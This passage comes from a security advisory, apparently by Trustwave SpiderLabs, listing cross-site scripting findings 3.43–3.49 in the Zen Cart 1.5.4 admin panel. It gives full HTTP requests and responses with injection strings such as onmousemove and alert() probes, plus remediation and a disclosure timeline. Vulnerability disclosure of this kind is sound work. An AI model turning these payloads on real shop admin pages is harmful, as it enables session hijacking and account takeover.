-----------------------------272002940131886 Content-Disposition: form-data; name="y" 0 -----------------------------272002940131886-- HTTP Response ----Truncated due to large size --- rong>Products Name:  Products Model: EXCLUDED Price: $12.00 Title/Tagline: EXCLUDED
    Meta Tag Title:  EXCLUDED
    Meta Tag Keywords:  Passwor1
    Meta Tag Description: 
    English Products Name: admin Products Model: EXCLUDED Price: $12.00 Title/Tagline: EXCLUDED
    Meta Tag Title:  alert(14405309.20497) -----------------------------272002940131886 Content-Disposition: form-data; name="products_model" testval -----------------------------272002940131886 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------272002940131886 Content-Disposition: form-data; name="x" 0 -----------------------------272002940131886 Content-Disposition: form-data; name="y" 0 -----------------------------272002940131886-- HTTP Response ----Truncated due to large size --- Products Name: admin Products Model: EXCLUDED Price: $12.00 Title/Tagline: EXCLUDED
    Meta Tag Title:  EXCLUDED
    Meta Tag Keywords:  Passwor1
    Meta Tag Description: 
    alert(14405309.20507) -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_description[1]" Default text -----------------------------272002940131886 Content-Disposition: form-data; name="products_model" testval -----------------------------272002940131886 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------272002940131886 Content-Disposition: form-data; name="x" 0 -----------------------------272002940131886 Content-Disposition: form-data; name="y" 0 -----------------------------272002940131886-- HTTP Response ----Truncated due to large size ---
    English Products Name: admin Products Model: EXCLUDED Price: $12.00 Title/Tagline: EXCLUDED
    Meta Tag Title:  EXCLUDED
    Meta Tag Keywords: 
    Meta Tag Description:  Default text
    Finding 3.43: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_description[1] Injection value: Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=new_product_preview HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=new_product Cookie: zenAdminID=h0ro03kt8iei0mbcu4kviq7pn2 Content-Type: multipart/form-data; boundary=---------------------------18630105114717 Content-Length: 4408 -----------------------------18630105114717 Content-Disposition: form-data; name="securityToken" 6dead581bdfe002d6b2ac17b640835d1 -----------------------------18630105114717 Content-Disposition: form-data; name="products_date_added" 2015-12-30 23:01:06 -----------------------------18630105114717 Content-Disposition: form-data; name="x" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="y" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="master_categories_id" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_price_sorter" 0.0000 -----------------------------18630105114717 Content-Disposition: form-data; name="products_status" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_date_available" 12/30/2015 -----------------------------18630105114717 Content-Disposition: form-data; name="manufacturers_id" -----------------------------18630105114717 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------18630105114717 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------18630105114717 Content-Disposition: form-data; name="products_price" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------18630105114717 Content-Disposition: form-data; name="products_qty_box_status" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity_mixed" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_description[1]" -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------18630105114717 Content-Disposition: form-data; name="products_model" testval -----------------------------18630105114717 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------18630105114717 Content-Disposition: form-data; name="products_previous_image" -----------------------------18630105114717 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------18630105114717 Content-Disposition: form-data; name="image_delete" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="overwrite" 1 -----------------------------18630105114717 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------18630105114717 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------18630105114717 Content-Disposition: form-data; name="products_weight" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_date_added" 2015-12-30 23:01:06 -----------------------------18630105114717-- HTTP Response HTTP/1.1 200 OK Date: Wed, 30 Dec 2015 23:09:56 GMT Server: Apache X-Powered-By: PHP/5.4.37 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=72 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Zen Cart!
    Admin Powered by Zen Cart :: The Art of E-Commerce
    Check for Updates to Zen Cart
    (You are presently using: v1.5.4)
      Wednesday 30 Dec 2015 11:09:57 PM +0000 GMT [::1]
    CMP-SL-73CF1 - Europe/London - English_United States.1252
    Admin Home |  Online Catalog |  Support Site |  Version |  Account |  Logoff 
    English admin $12.00
    Warning: Does not show Quantity Box, Default to Qty 1
    admin
    For more information, please visit this products webpage.
    This product was added to our catalog on Wednesday 30 December, 2015.
        Cancel
    Zen Cart:: the art of e-commerce

    E-Commerce Engine Copyright © 2003-2015 Zen Cart®
    Zen Cart v1.5.4/v1.5.4

    Finding 3.44: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_url[1] Injection value: >"> Detection value: alert(14515090.17347) HTTP Request POST /zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=new_product_preview HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=new_product Cookie: zenAdminID=h0ro03kt8iei0mbcu4kviq7pn2 Content-Type: multipart/form-data; boundary=---------------------------18630105114717 Content-Length: 4395 -----------------------------18630105114717 Content-Disposition: form-data; name="securityToken" 6dead581bdfe002d6b2ac17b640835d1 -----------------------------18630105114717 Content-Disposition: form-data; name="products_date_added" 2015-12-30 23:01:06 -----------------------------18630105114717 Content-Disposition: form-data; name="x" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="y" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="master_categories_id" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_price_sorter" 0.0000 -----------------------------18630105114717 Content-Disposition: form-data; name="products_status" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_date_available" 12/30/2015 -----------------------------18630105114717 Content-Disposition: form-data; name="manufacturers_id" -----------------------------18630105114717 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------18630105114717 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------18630105114717 Content-Disposition: form-data; name="products_price" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------18630105114717 Content-Disposition: form-data; name="products_qty_box_status" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity_mixed" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_description[1]" test -----------------------------18630105114717 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------18630105114717 Content-Disposition: form-data; name="products_model" testval -----------------------------18630105114717 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------18630105114717 Content-Disposition: form-data; name="products_previous_image" -----------------------------18630105114717 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------18630105114717 Content-Disposition: form-data; name="image_delete" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="overwrite" 1 -----------------------------18630105114717 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------18630105114717 Content-Disposition: form-data; name="products_url[1]" >"> -----------------------------18630105114717 Content-Disposition: form-data; name="products_weight" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------18630105114717 Content-Disposition: form-data; name="products_date_added" 2015-12-30 23:01:06 -----------------------------18630105114717-- HTTP Response HTTP/1.1 200 OK Date: Wed, 30 Dec 2015 23:10:07 GMT Server: Apache X-Powered-By: PHP/5.4.37 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=65 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Zen Cart!
    Admin Powered by Zen Cart :: The Art of E-Commerce
    Check for Updates to Zen Cart
    (You are presently using: v1.5.4)
      Wednesday 30 Dec 2015 11:10:08 PM +0000 GMT [::1]
    CMP-SL-73CF1 - Europe/London - English_United States.1252
    Admin Home |  Online Catalog |  Support Site |  Version |  Account |  Logoff 
    English admin $12.00
    Warning: Does not show Quantity Box, Default to Qty 1
    admintest
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Wednesday 30 December, 2015.
        Cancel
    Zen Cart:: the art of e-commerce

    E-Commerce Engine Copyright © 2003-2015 Zen Cart®
    Zen Cart v1.5.4/v1.5.4

    Finding 3.45: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: GET: search Injection value: x" onmousemove="alert(14514152.28327) Detection value: x" onmousemove="alert(14514152.28327) HTTP Request GET /zen-cart/admin1/product.php?cPath=0&product_type=0&pID=209&action=new_product_preview&search=x" onmousemove="alert(14514152.28327)&vcheck=yes HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive X-Cenzic-Spider-Send-HeadRequest: true Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=0&product_type=0&pID=209&action=new_product_preview&search=test Cookie: zenAdminID=silie6i71hqsgavjqushbv61o4 HTTP Response HTTP/1.1 200 OK Date: Tue, 29 Dec 2015 22:42:23 GMT Server: Apache X-Powered-By: PHP/5.4.37 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Zen Cart!
    Admin Powered by Zen Cart :: The Art of E-Commerce
    Your version of Zen Cart® appears to be current.
    (You are presently using: v1.5.4)
      Tuesday 29 Dec 2015 10:42:24 PM +0000 GMT [::1]
    CMP-SL-73CF1 - Europe/London - English_United States.1252
    Admin Home |  Online Catalog |  Support Site |  Version |  Account |  Logoff 
    English  $12.00
    This product was added to our catalog on Tuesday 29 December, 2015.
        Cancel
    Zen Cart:: the art of e-commerce

    E-Commerce Engine Copyright © 2003-2015 Zen Cart®
    Zen Cart v1.5.4/v1.5.4

    Finding 3.46: Persistent Cross-Site Scripting. Current injection value: Injection URI: http://localhost:8081/zen-cart/admin1/categories.php?reset_editor=1&cID=0&cPath=0&pID=61c3p0z14514152.38317r2d2z&action=set_editor Injected item: GET : pID Injection value: Reflection URI: http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=1&zID=1&action=insert_zone Detection string: alert(14514152.38317) HTTP Request POST /zen-cart/admin1/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=1&zID=1&action=new_zone Cookie: zenAdminID=silie6i71hqsgavjqushbv61o4 Content-Type: application/x-www-form-urlencoded Content-Length: 160 securityToken=52cfc6f49a1be964cd408c77646a82ba&geo_zone_name=admin&geo_zone_description=testval&x=0&y=0& HTTP Response HTTP/1.1 200 OK Date: Wed, 30 Dec 2015 00:13:23 GMT Server: Apache X-Powered-By: PHP/5.4.37 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Zen Cart!
    Admin Powered by Zen Cart :: The Art of E-Commerce
    Check for Updates to Zen Cart
    (You are presently using: v1.5.4)
      Wednesday 30 Dec 2015 12:13:24 AM +0000 GMT [::1]
    CMP-SL-73CF1 - Europe/London - English_United States.1252
    Admin Home |  Online Catalog |  Support Site |  Version |  Account |  Logoff 
    Zone Definitions - Taxes, Payment and Shipping
    LEGEND:   : Taxes & Zones Defined    : Zones Defined but not Taxes     : Not Configured    
    Zone Name Zone Description Status Action 
    Folder admin testval Info 
    Folder admin testval Info 
    Folder admin testval Info 
    Folder admin testval Info 
    Folder admin testval Info 
    Folder admin c3p0z14514152.38067r2d2z Info 
    Folder admin testval Info 
    Folder admin testval  
    Folder admin testval Info 
    Folder admin testval Info 
    Folder admin testval Info 
    Folder admin Info 
    Folder alert(14514152.38167) testval Info 
    Folder alert(14514152.38247) testval Info 
    Folder c3p0z14514152.38087r2d2z testval Info 
    Folder c3p0z1a2a3ar2d2z testval Info 
    Folder Florida Florida local sales tax zone Info 
    Displaying 21 to 37 (of 37 tax zones)
    <<  Page of 2  >>
    Insert
    admin
    Edit Delete Details

    Number of Zones: 0

    Number of Tax Rates: 0

    Date Added: 12/30/2015

    Description:
    testval
    Zen Cart:: the art of e-commerce

    E-Commerce Engine Copyright © 2003-2015 Zen Cart®
    Zen Cart v1.5.4/v1.5.4

    Finding 3.47: Persistent Cross-Site Scripting. Current injection value: 132312 Injection URI: http://localhost:8081/zen-cart/admin1/categories.php?set_display_categories_dropdown=1&cID=1&cPath=c3p0z14507304.25907r2d2z&page=0&vcheck=yes Injected item: GET : cPath Injection value: Reflection URI: http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_value&value_page=1 Detection string: alert(14507304.25907) HTTP Request POST /zen-cart/admin1/options_values_manager.php?action=update_value&value_page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=4&value_page=1 Cookie: zenAdminID=qj17gn2vluuq7iknle1aefn3r3 Content-Type: application/x-www-form-urlencoded Content-Length: 203 securityToken=f30ffae6475aa7c037f703d7983c8eff&value_id=4&value_name%5B2%5D=admin&value_name%5B1%5D=admin&products_options_values_sort_order=132312 HTTP Response HTTP/1.1 200 OK Date: Mon, 21 Dec 2015 22:30:15 GMT Server: Apache X-Powered-By: PHP/5.4.37 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Zen Cart!
    Warning Possible Duplicate Options Value Added TESTVAL : - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 2 - 3 - 4
    Warning MISSING LANGUAGE FILES OR DIRECTORIES ... Testval admin
    Admin Powered by Zen Cart :: The Art of E-Commerce
    Check for Updates to Zen Cart
    (You are presently using: v1.5.4)
    Define Language:  
    Monday 21 Dec 2015 10:30:16 PM +0000 GMT [::1]
    CMP-SL-73CF1 - Europe/London - English_United States.1252
    Admin Home |  Online Catalog |  Support Site |  Version |  Account |  Logoff 
    Edit Attributes   Option Names Manager
      
    Edit Product Options for additional settings
     Option Values 
    1 |
     ID   Option Name   Option Value   Default Order  Action 
     3   admin   admin  132312  Update  Delete 
     1   admin   admin  132312  Update  Delete 
     2   admin   admin  132312  Update  Delete 
     4   admin   admin  132312  Update  Delete 
     5     te:  
    en:  
    Order:     
    Copy to ALL Products where Option Name and Value ...
    Select an Option Name and Value that currently exists on a product or products that you then want to copy another Option Name and Value to for all products with this existing Option Name and Value
    Option Name to match:
     
    Option Value to match:
     
    Option Name to add:
     
    Option Value to add:
     
    Leave blank for ALL Products or
    enter a Category ID for Products to update
       
      
    Delete Matching Attribute from ALL Products where Option Name and Value ...
    Select an Option Name and Value that currently exists on a product or products that you want deleted from ALL Products or from ALL Products within one Category
    Option Name to match:
     
    Option Value to match:
     
    Leave blank for ALL Products or
    enter a Category ID for Products to update
       
      
    Copy Option Name/Value to Products with existing Option Name ...
    Select an Option Name and Value that currently exists on a product or products to add to all products or to only the products in the selected category that have the selected Option Name.
    Example: Add Option Name: Color Option Value: Red to all Products with Option Name: Size
    Example: Add Option Name: Color Option Value: Green with default values from Products ID: 34 to all Products with Option Name: Size
    Example: Add Option Name: Color Option Value: Green with default values from Products ID: 34 to all Products with Option Name: Size for Categories ID: 65
    Option Name to add:
     
    Option Value to add:
     

    Default New Attribute Values from Product ID# or leave blank for no default values:   
    Option Name to add to:
     
    Leave blank for ALL Products or
    enter a Category ID for Products to update
      
    How should existing product attributes be handled?
    Update existing attributes with new settings/prices
    Ignore existing attributes and add only new attributes 
      
    Zen Cart:: the art of e-commerce

    E-Commerce Engine Copyright © 2003-2015 Zen Cart®
    Zen Cart v1.5.4/v1.5.4
    Finding 3.48: Persistent Cross-Site Scripting. Current injection value: update_product Injection URI: http://localhost:8081/zen-cart/admin1/attributes_controller.php?action=delete_option_name_values_confirm&products_options_id_all=2&attribute_page=1&products_filter=2¤t_category_id=0& Injected item: GET : CENZIC_DUMMY_PARAM Injection value: Reflection URI: http://localhost:8081/zen-cart/admin1/option_values.php?action=update_product Detection string: alert(14507304.47657) HTTP Request POST /zen-cart/admin1/option_values.php?action=update_product HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/option_values.php Cookie: zenAdminID=qj17gn2vluuq7iknle1aefn3r3 Content-Type: application/x-www-form-urlencoded Content-Length: 87 products_update_id=&securityToken=f30ffae6475aa7c037f703d7983c8eff&products_update_id=3 HTTP Response HTTP/1.1 200 OK Date: Mon, 21 Dec 2015 22:49:20 GMT Server: Apache X-Powered-By: PHP/5.4.37 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Zen Cart!
    Success Successful Attribute Sort Order Update for ID# 3 admin
    Warning MISSING LANGUAGE FILES OR DIRECTORIES ... Testval admin
    Admin Powered by Zen Cart :: The Art of E-Commerce
    Check for Updates to Zen Cart
    (You are presently using: v1.5.4)
    Define Language:  
    Monday 21 Dec 2015 10:49:21 PM +0000 GMT [::1]
    CMP-SL-73CF1 - Europe/London - English_United States.1252
    Admin Home |  Online Catalog |  Support Site |  Version |  Account |  Logoff 
    Option Values Default Sort Order
    Update Option Values Sort Order
    Select an Option Name:      

    Update Attribute Sort Order from Option Value Defaults

    For a Product:

    For a Category:

    Update All Products' Attribute Sort Orders
    to match Option Value Default Sort Orders:
    Zen Cart:: the art of e-commerce

    E-Commerce Engine Copyright © 2003-2015 Zen Cart®
    Zen Cart v1.5.4/v1.5.4
    Finding 3.49: Persistent Cross-Site Scripting. Current injection value: False'"--> Injection URI: http://localhost:8081/zen-cart/admin1/products_price_manager.php?action=edit&products_filter=3 Injected item: GET : action Injection value: edit Reflection URI: http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet&action=save Detection string: prompt(14507304.81097) HTTP Request POST /zen-cart/admin1/modules.php?set=payment&module=authorizenet&action=save HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet&action=edit Cookie: zenAdminID=qj17gn2vluuq7iknle1aefn3r3 Content-Type: application/x-www-form-urlencoded Content-Length: 1100 securityToken=f30ffae6475aa7c037f703d7983c8eff&configuration%5BMODULE_PAYMENT_AUTHORIZENET_STATUS%5D=False&configuration%5BMODULE_PAYMENT_AUTHORIZENET_LOGIN%5D=admin&configuration%5BMODULE_PAYMENT_AUTHORIZENET_TXNKEY%5D=12-3456789&configuration%5BMODULE_PAYMENT_AUTHORIZENET_MD5HASH%5D=12-3456789&configuration%5BMODULE_PAYMENT_AUTHORIZENET_TESTMODE%5D=Test&configuration%5BMODULE_PAYMENT_AUTHORIZENET_METHOD%5D=Credit+Card&configuration%5BMODULE_PAYMENT_AUTHORIZENET_AUTHORIZATION_TYPE%5D=Authorize&configuration%5BMODULE_PAYMENT_AUTHORIZENET_USE_CVV%5D=False'"-->&configuration%5BMODULE_PAYMENT_AUTHORIZENET_EMAIL_CUSTOMER%5D=False&configuration%5BMODULE_PAYMENT_AUTHORIZENET_ZONE%5D=1&configuration%5BMODULE_PAYMENT_AUTHORIZENET_ORDER_STATUS_ID%5D=1&configuration%5BMODULE_PAYMENT_AUTHORIZENET_SORT_ORDER%5D=John&configuration%5BMODULE_PAYMENT_AUTHORIZENET_GATEWAY_MODE%5D=offsite&configuration%5BMODULE_PAYMENT_AUTHORIZENET_STORE_DATA%5D=True&configuration%5BMODULE_PAYMENT_AUTHORIZENET_DEBUGGING%5D=Alerts+Only&saveButton.x=0&saveButton.y=0 HTTP Response HTTP/1.1 200 OK Date: Mon, 21 Dec 2015 23:20:19 GMT Server: Apache X-Powered-By: PHP/5.4.37 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Zen Cart!
    Warning MISSING LANGUAGE FILES OR DIRECTORIES ... Testval admin
    Admin Powered by Zen Cart :: The Art of E-Commerce
    Check for Updates to Zen Cart
    (You are presently using: v1.5.4)
    Define Language:  
    Monday 21 Dec 2015 11:20:20 PM +0000 GMT [::1]
    CMP-SL-73CF1 - Europe/London - English_United States.1252
    Admin Home |  Online Catalog |  Support Site |  Version |  Account |  Logoff 
    Payment Modules
    Modules   Sort Order Orders Status Action 
    Authorize.net (SIM) (in Testing mode) authorizenet           
    Authorize.net (AIM) authorizenet_aim          Info 
    Authorize.net - eCheck authorizenet_echeck          Info 
    Cash on Delivery cod          Info 
    Free Order freecharger 0      default    Info 
    FirstData/Linkpoint/YourPay API linkpoint_api          Info 
    Check/Money Order (not configured - needs pay-to) moneyorder 0      default    Info 
    PayPal Payments Standard PayPal          Info 
    PayPal Payments Pro PayPal          Info 
    PayPal Express Checkout PayPal          Info 
    Module Directory: C:/UniServerZ/www/zen-cart/includes/modules/payment/
    Authorize.net (SIM) (in Testing mode)
    Edit
    Remove Module

    Click Here to Sign Up for an Account

    Click to Login to the Authorize.net Merchant Area

    Requirements:

    *Authorize.net Account (see link above to signup)
    *Authorize.net username and transaction key available from your Merchant Area

    Enable Authorize.net Module
    False

    Login ID
    admin

    Transaction Key
    **********

    MD5 Hash
    **********

    Transaction Mode
    Test

    Transaction Method
    Credit Card

    Authorization Type
    Authorize

    Request CVV Number
    False

    Customer Notifications
    False

    Payment Zone
    admin

    Set Order Status
    Pending [1]

    Sort order of display.
    John

    Gateway Mode
    offsite

    Enable Database Storage
    True

    Debug Mode
    Alerts Only
    Zen Cart:: the art of e-commerce

    E-Commerce Engine Copyright © 2003-2015 Zen Cart®
    Zen Cart v1.5.4/v1.5.4

    Remediation Steps: Upgrade to Zen Cart v1.5.5. or the latest stable release. Revision History: 09/21/2015 - Vulnerability disclosed to vendor 03/17/2016 - Vendor releases fix in version 5.07.0013 03/22/2016 - Advisory published About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.